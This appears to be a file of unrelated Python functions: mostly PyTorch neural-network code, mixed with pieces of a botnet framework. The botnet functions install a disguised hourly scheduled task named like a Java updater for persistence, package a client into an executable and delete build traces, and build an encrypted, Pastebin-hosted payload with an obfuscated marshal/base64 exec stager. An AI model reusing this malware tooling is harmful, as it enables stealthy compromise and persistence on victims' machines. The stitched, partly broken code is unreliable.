def _add_scheduled_task(value=None, name='Java-Update-Manager'): try: if os.name == 'nt' and not _methods['scheduled_task'].established: value = sys.argv[0] name = util.variable(random.randint(6,11)) if value and os.path.isfile(value): result = subprocess.check_output('SCHTASKS /CREATE /TN {} /TR {} /SC hourly /F'.format(name, value), shell=True) if 'SUCCESS' in result: return (True, result.replace('"', '')) except Exception as e: util.log('Add scheduled task error: {}'.format(str(e))) return (False, None)
def _add_scheduled_task(value=None, name='Java-Update-Manager'): try: if os.name == 'nt' and not _methods['scheduled_task'].established: value = sys.argv[0] name = util.variable(random.randint(6, 11)) if value and os.path.isfile(value): result = subprocess.check_output( 'SCHTASKS /CREATE /TN {} /TR {} /SC hourly /F'.format( name, value), shell=True) if 'SUCCESS' in result: return (True, result.replace('"', '')) except Exception as e: util.log('Add scheduled task error: {}'.format(str(e))) return (False, None)
def decoder(self, last_hidden, targets): batch_size = last_hidden.shape[0] outputs = [] # Initialize decoder states cell = variable(torch.zeros(batch_size, last_hidden.shape[1])) hidden = last_hidden # Initialize generated steps with a start token step = variable(torch.LongTensor(batch_size, ).fill_(self.init_idx)) # Generating loop for i in range(self.max_len): hidden, cell = self.dec(self.emb(step), (hidden, cell)) output = self.lin(hidden) if targets is not None and i < len(targets): step = targets[:, i] else: step = torch.multinomial(F.softmax(output, dim=-1), 1).squeeze(-1) outputs.append(output) outputs = torch.stack(outputs, dim=1) return outputs
def exe(options, filename): try: orig = os.getcwd() os.chdir(os.path.dirname(filename)) pyname = os.path.basename(filename) name = os.path.splitext(pyname)[0] dist = os.path.dirname(filename) key = util.variable(16) icon = options.icon if os.path.isfile('resources/icon/%s.ico' % options.icon) else None pkgs = list( set([ i.strip().split()[1] for i in open(filename).read().splitlines() if i.strip().split()[0] == 'import' ] + [ i.strip().split()[1] for i in urllib.urlopen( json.loads( open('resources/setup.sqlpackages.json').read()).get( 'w')).read().splitlines() if i.strip().split()[0] == 'import' if len(str(i.strip().split()[1])) < 35 ])) spec = open('resources/pyinstaller.spec', 'r').read().replace('[HIDDEN_IMPORTS]', str(pkgs)).replace( '[ICON_PATH]', icon).replace('[PY_FILE]', pyname).replace( '[DIST_PATH]', dist).replace('[NAME]', name).replace('[128_BIT_KEY]', key) fspec = os.path.join(dist, name + '.spec') with file(fspec, 'w') as fp: fp.write(spec) make = subprocess.Popen('%s -m PyInstaller %s' % (sys.executable, fspec), 0, None, None, subprocess.PIPE, subprocess.PIPE, shell=True) exe = os.path.join(os.path.join(dist, 'dist'), name + '.exe') _ = map(util.delete, (filename, fspec, os.path.join(dist, 'build'))) os.chdir(orig) return exe except Exception as e3: raise ClientError('{} error: {}'.format(client_exe.func_name, str(e3)))
def main(): model = torch.load('rnn.pt') embeddings = model.x vocab_file = open('ptb/train.txt.vcb', "r") vocabulary = [w.strip() for w in vocab_file.readlines()] vocab_size = len(vocabulary) vocab_file.close() words = variable(torch.LongTensor(range(vocab_size)).cuda()) wv = embeddings(words).data.cpu()numpy() tsne = TSNE(n_components=2, random_state=0) np.set_printoptions(suppress=True) Y = tsne.fit_transform(wv[:1000, :]) plt.scatter(Y[:, 0], Y[:, 1]) for label, x, y in zip(vocabulary, Y[:, 0], Y[:, 1]): plt.annotate(label, xy=(x, y), xytext=(0, 0), textcoords='offset points') plt.show() plt.savefig('wordsssss')
def forward(self, input_): ''' @input_: ''' batch_size = len(input_) lengths = [len(wd)+2 for wd in input_] max_len = max(lengths) #ord('\a') = 7. This will be my buffer character. input_words = [chr(5) + wd + chr(6) + chr(7)*(max_len-len(wd)) for wd in input_] #input_words = [ord(chr) for wd in input_words for chr in wd] input_words = [[ord(chr) for chr in wd] for wd in input_words] input_embedding = self.x(variable(T.LongTensor(input_words))).transpose(1,2) #batch_size x character_vector_dim x length(longest word) + 2 #output of convlution is of size batch_size x convolution_output_filter_dim x len(longest_word) +2 - (lack of padding) c2 = F.relu(self.conv2(input_embedding).max(2)[0]) c3 = F.relu(self.conv3(input_embedding).max(2)[0]) c4 = F.relu(self.conv4(input_embedding).max(2)[0]) #OUTPUT of max removed (longest word) dimension, so now its just batch_size and convolution filters c2 = c2.resize(batch_size, self.convHidden_size2) c3 = c3.resize(batch_size, self.convHidden_size3) c4 = c4.resize(batch_size, self.convHidden_size4) conv_out = T.cat([c2, c3, c4],1) #conv_out = conv_out.resize(1,batch_size*3*(max_len+1)*(self._embed_size-1)) fc1 = F.relu(self.Res1(conv_out)) fc2 = F.relu(self.Res2(fc1)) fc3 = F.relu(self.Res3(fc2)) return fc3
def forward(self, input_): ''' @input_: LongTensor containing indices (batch_size, sentence_length) ''' batch_size = len(input_) lengths = [len(wd) for wd in input_] max_len = max(lengths) #ord('\a') = 7. This will be my buffer character. input_back = [wd[::-1] + chr(7)*(max_len-len(wd)) for wd in input_] input_forw = [wd + chr(7)*(max_len-len(wd)) for wd in input_] h = variable(T.zeros(batch_size, self._state_size)) c = variable(T.zeros(batch_size, self._state_size)) h2 = variable(T.zeros(batch_size, self._state_size)) c2 = variable(T.zeros(batch_size, self._state_size)) h_output = [None]*batch_size h2_output = [None]*batch_size for t in range(max_len): chars = [None]*batch_size for i in range(batch_size): chars[i] = ord(input_forw[i][t]) f = self.x(variable(T.LongTensor(chars))) #I wanted to do the following line of code. but it didnt work so I used the above. #f = self.x(variable(T.LongTensor([ord(wd[t]) for wd in input_forw]))) h, c = self.fLSTM(f, (h, c)) chars = [None]*batch_size for i in range(batch_size): chars[i] = ord(input_back[i][t]) b = self.x(variable(T.LongTensor(chars))) #Same as above #b = self.x(variable(T.LongTensor([ord(wd[t]) for wd in input_back]))) h2, c2 = self.bLSTM(b, (h2, c2)) for idx, l in enumerate(lengths): if l == t+1: h_output[idx] = h[idx] h2_output[idx] = h2[idx] h_output = T.stack(h_output, 0) h2_output = T.stack(h2_output, 0) return self.fOut(h_output) + self.bOut(h2_output)#T.stack(output, 1)
def py(options, payload='payload.py', stager='stager.py'): try: with open(payload, 'r') as fp: payload = fp.read() with open(stager, 'r') as fp: stager = fp.read() stager = '\n'.join([ '#!/usr/bin/python', "from __future__ import print_function", stager, "if __name__=='__main__':", "\t{}=main(config={})".format( util.variable(1), json.dumps(dict(options._get_kwargs()))) ]) color = colorama.Fore.RESET name = 'byob_%s.py' % util.variable(3) path = os.path.join( os.path.expandvars('%TEMP%') if os.name is 'nt' else '/tmp', name) if options.name: name = options.name path = os.path.join( os.path.expandvars('%TEMP%') if os.name is 'nt' else '/tmp', name) if options.encrypt: key = os.urandom(16) print(colorama.Fore.RESET + colorama.Style.BRIGHT + "Encrypting payload ({:,} bytes)...\n".format(len(payload))) code = crypto.encrypt_xor(payload, key, block_size=8, key_size=16, num_rounds=32, padding='\x00') diff = round( float(100.0 * float(1.0 - float(len(code)) / float(len(payload))))) print(colorama.Fore.GREEN + colorama.Style.BRIGHT + "[+] " + colorama.Fore.RESET + "Payload encryption complete") print( color + colorama.Style.DIM + " (Plaintext {:,} bytes {} to ciphertext {:,} bytes ({}% {})" .format(len(stager), 'increased' if diff else 'reduced', len(code), diff, 4), 'larger' if diff else 'smaller').ljust(80 - len("[+] ")) payload = code url = util.pastebin(payload) print(colorama.Fore.GREEN + colorama.Style.BRIGHT + "[+] " + colorama.Fore.RESET + "Upload to Pastebin complete") print(color + colorama.Style.DIM + " ({:,} bytes uploaded to: {}".format(len( payload), url).ljust(80 - len("[+] "))) if options.obfuscate: code = "import zlib,base64,marshal;exec(marshal.loads(zlib.decompress(base64.b64decode({}))))".format( repr( base64.b64encode( zlib.compress( marshal.dumps(compile(stager, '', 'exec')), 9)))) diff = round( float(100.0 * float(1.0 - float(len(code)) / float(len(stager))))) print(colorama.Fore.GREEN + colorama.Style.BRIGHT + "[+] " + colorama.Fore.RESET + "Stager obfuscation and minification complete") print(color + colorama.Style.DIM + " ({:,} bytes {} to {:,} bytes ({}% {})".format( len(stager), 'increased' if diff else 'reduced', len( code), diff, 'larger' if diff else 'smaller').ljust( 80 - len("[+] "))) stager = code with file(path, 'w') as fp: fp.write(stager) print(colorama.Fore.GREEN + colorama.Style.BRIGHT + "[+] " + colorama.Fore.RESET + "Client stager generation complete") print(color + colorama.Style.DIM + " ({:,} bytes written to file: {})".format(len( stager), path).ljust(80 - len("[+] "))) if options.type == 'exe': path = exe(options) return path except Exception as e: raise ClientError(str(e))
train_offsets = [int(l.strip()) for l in train_idx.readlines()] valid_offsets = [int(l.strip()) for l in valid_idx.readlines()] train_datagen = data_generator(train_tok, train_offsets, args.batchsize) valid_datagen = data_generator(valid_tok, valid_offsets, args.batchsize) train_batches = len(train_offsets) // args.batchsize valid_batches = len(valid_offsets) // args.batchsize for E in range(args.epochs): model.train() hidden = model.init_hidden(args.batchsize) for B in range(train_batches): max_len, input_, mask, target = six.next(train_datagen) assert mask.sum(1).min() >= args.minlength input_ = variable(input_) mask = variable(mask) target = variable(target) hidden = repackage_hidden(hidden) output = model.forward(input_) masked_output = mask.unsqueeze(2).expand_as(output) * output masked_loss = -masked_output.gather( 2, target.view(args.batchsize, max_len, 1) )[:, :, 0] loss = masked_loss.sum() / mask.sum() loss.backward() clip_gradients(model, args.gradnorm)
"Deutschland", "Deutsch", "USA", "Englisch", "Frankreich", "Franzoesisch", "Griechenland", "Griechisch", "Norwegen", "Norwegisch", "Schweden", "Schwedisch", "Polen", "Polnisch", "Ungarn", "Ungarisch" ] words_inputs = [ "male", "female", "USA", "America", "play", "playing", "man", "woman" ] loaded_model = torch.load('rnn.pt') embeddings = loaded_model.x vocab_file = open('ptb/train.txt.vcb', "r") vocab = [w.strip() for w in vocab_file.readlines()] vocab_size = len(vocab) vocab_file.close() words = variable(torch.LongTensor(range(vocab_size)).cuda()) vectors = embeddings(words).data.cpu().numpy() def draw_words(model, words, pca=False, alternate=True, arrows=True, x1=3, x2=3, y1=3, y2=3, title=''): if pca:
def forward(self, x): self.count += 1 batch_size = x.size()[0] h_tilde = alloc_list(self.L + 1) z_tilde = alloc_list(self.L + 1) h = alloc_list(self.L + 1) z = alloc_list(self.L + 1) z_pre = alloc_list(self.L + 1) mu = alloc_list(self.L + 1) sigma = alloc_list(self.L + 1) u = alloc_list(self.L + 1) z_hat = alloc_list(self.L + 1) z_hat_bn = alloc_list(self.L + 1) h_tilde[0] = z_tilde[0] = noised(x) for l in range(1, self.L + 1): z_tilde[l] = noised( self.batchnorm(self.W[l](h_tilde[l - 1]), l, 'noisy')) _beta = self.beta[l].unsqueeze(0) _gamma = self.gamma[l].unsqueeze(0) if z_tilde[l].dim() == 4: _beta = _beta.unsqueeze(2).unsqueeze(3) _gamma = _gamma.unsqueeze(2).unsqueeze(3) _beta = _beta.expand_as(z_tilde[l]) _gamma = _gamma.expand_as(z_tilde[l]) h_tilde[l] = self.act[l](_gamma * (z_tilde[l] + _beta)) #print 'h_tilde', l, var_to_numpy(h_tilde[l]).max(), var_to_numpy(h_tilde[l]).min() assert not anynan(h_tilde[l].data) y_tilde = h_tilde[self.L] h[0] = z[0] = x for l in range(1, self.L + 1): z_pre[l] = self.W[l](h[l - 1]) if self.training: mu[l], var = batchnorm_mean_var(z_pre[l]) sigma[l] = (var + _eps).sqrt() else: mu[l] = variable(self.mean[l]).unsqueeze(0) sigma[l] = (variable(self.var[l]) + _eps).sqrt().unsqueeze(0) if z_pre[l].dim() == 4: mu[l] = mu[l].unsqueeze(2).unsqueeze(3) sigma[l] = sigma[l].unsqueeze(2).unsqueeze(3) z[l] = self.batchnorm(self.W[l](h[l - 1]), l, 'clean') _beta = self.beta[l].unsqueeze(0) _gamma = self.gamma[l].unsqueeze(0) if z_tilde[l].dim() == 4: _beta = _beta.unsqueeze(2).unsqueeze(3) _gamma = _gamma.unsqueeze(2).unsqueeze(3) _beta = _beta.expand_as(z[l]) _gamma = _gamma.expand_as(z[l]) h[l] = self.act[l](_gamma * (z[l] + _beta)) #print 'h', l, var_to_numpy(h[l]).max(), var_to_numpy(h[l]).min() assert not anynan(h[l].data) y = h[self.L] for l in range(self.L, -1, -1): if l == self.L: u[l] = self.batchnorm(h_tilde[self.L], l, 'dec') else: u[l] = self.batchnorm(self.V[l + 1](z_hat[l + 1]), l, 'dec') z_hat[l] = self.g[l](z_tilde[l], u[l]) if l != 0: # Seems that they are not normalizing z_hat on the # first layer... _mu = mu[l].expand_as(z_hat[l]) _sigma = sigma[l].expand_as(z_hat[l]) assert (_sigma.data == 0).sum() == 0 z_hat_bn[l] = (z_hat[l] - _mu) / _sigma else: z_hat_bn[l] = z_hat[l] #print 'z_hat', l, var_to_numpy(z_hat[l]).max(), var_to_numpy(z_hat[l]).min() #print 'z_hat_bn', l, var_to_numpy(z_hat_bn[l]).max(), var_to_numpy(z_hat_bn[l]).min() assert not anynan(z_hat_bn[l].data) rec_loss = 0 for l in range(0, self.L + 1): rec_loss += self.lambda_[l] * ((z[l] - z_hat_bn[l])**2).mean() return y_tilde, y, rec_loss
def noisify(x, std = .1, train=False): return x + (variable(T.randn(x.size()) * std) if train else 0)